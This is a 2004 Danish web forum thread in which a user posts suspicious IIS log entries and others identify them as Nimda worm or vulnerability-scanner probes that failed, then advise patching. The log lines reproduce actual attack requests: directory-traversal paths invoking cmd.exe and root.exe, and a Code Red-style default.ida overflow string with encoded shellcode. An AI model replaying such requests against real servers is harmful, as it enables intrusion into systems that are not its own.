Søg
Avatar billede strikemusic Nybegynder
01. april 2004 - 14:07 Der er 7 kommentarer og
2 løsninger

Hvad betyder disse entry'es i min logfil

Jeg har fået et par mærkværdige entry's i min logfil
er det en der forsøger at hacke mig eller har adgang til min web
Hvis ja, hvordan sikrer jeg mig bedre. Hvad betyder det forskellige og hvilke programmer er der brugt? her er hvad jeg har opsaveret:
80.56.100.241 - - [25/Mar/2004:23:07:40 +0100] "GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184

80.161.23.180 - - [27/Mar/2004:13:00:16 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:18 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:19 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:21 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:22 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:23 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
80.161.23.180 - - [27/Mar/2004:13:00:23 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:25 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:26 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:27 +0100] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:28 +0100] "GET /winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:29 +0100] "GET /winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:31 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:31 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:32 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184
80.161.23.180 - - [27/Mar/2004:13:00:33 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 4184

193.190.169.124 - - [31/Mar/2004:16:28:44 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 403 4227
Avatar billede hojben Novice
01. april 2004 - 14:11 #1
det er nimda virusen..

Fejl 404 betyder at den ikke har fået fat i noget :)
Avatar billede and_ Nybegynder
01. april 2004 - 14:16 #2
den lever endnu :)
Avatar billede hojben Novice
01. april 2004 - 14:17 #3
så længe du har hentet alle de patch's der er tilgængelige fra MS er du sikker imod nimda.. :)
Avatar billede bufferzone Praktikant
01. april 2004 - 14:19 #4
De ligner Nimda, man kan også være modificeret scanning med N-stealth, wiskers eller anden webserver sårbarhedsscanner der er kamufleret som nimda. Der er før set at det gørtes sådan for at kamuflere at der er tale om en sårbarhedsscanning og ikke et banalt virusangreb.

Som de andre er inde på er der intet sket, men du bør bestemt holde øje med din log i de næreste par dage og reagere hvis du får mærkelige urls
Avatar billede strikemusic Nybegynder
01. april 2004 - 14:23 #5
Så er det bare lige hvordan jeg sikrer mig bedre jeg har opdateret min SW
Avatar billede hojben Novice
01. april 2004 - 14:27 #6
http://v4.windowsupdate.microsoft.com/en/default.asp
Avatar billede strikemusic Nybegynder
01. april 2004 - 14:52 #7
Ja Ja hojben det er meget godt det har jeg gjort Jeg syntes måske at det kunne være sjovere at finde ud af hvilket program der har været brugt hvis man kunne få fingre i det kunne man måske finde ud af helt exakt hvad det gør
Avatar billede hojben Novice
01. april 2004 - 14:53 #8
bare forsøg af få nimda viraen så kan du måske se hvad den gør ;o)
Avatar billede strikemusic Nybegynder
01. april 2004 - 15:33 #9
OK Tak for hjælpen
Lukket
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
It-udvikling & AI kurser
Uanset kodesprog, så giver vi dig mulighederne for at udvikle det, du behøver.
Se alle It-udvikling & AI kurser

Flere spørgsmål fra Webservere kategorien

Titel Indlæg Oprettet Seneste aktivitet
HTML-LINKS Af snestrup2000 i Webservere 2 16/11/202415:33 16/11/202418:41
Wordpress fejl Action Scheduler ? Af fimo i Webservere 2 24/10/202410:16 27/10/202412:07
My Cloud Home (hjemme server) Af Erik Hovedskou i Webservere 13 19/10/202419:51 20/10/202419:35
Periodisk lang responstid Af AlbertK i Webservere 3 23/08/202415:54 24/08/202421:48
Yousee Af nu_igen i Webservere 1 08/04/202408:21 09/04/202409:44
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester

Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I går 21:46 Opkald fra google Af Uvanga i Mobilnetværk
I går 17:54 Ny Chormeast ( Hvilken ?? ) Af Mikael i Fjernsyn & projektorer
I går 11:50 Er der fejl på Outlook (new) Af fase i E-mail programmer
27/1106:34 Windows 11 - Bekræft din identitet Af Jan Post i Windows
26/1119:31 Ingen danske tekster på YouTube i Edge, men vises på Chrome Af ErikHg i Windows
White papers
Flere white papers »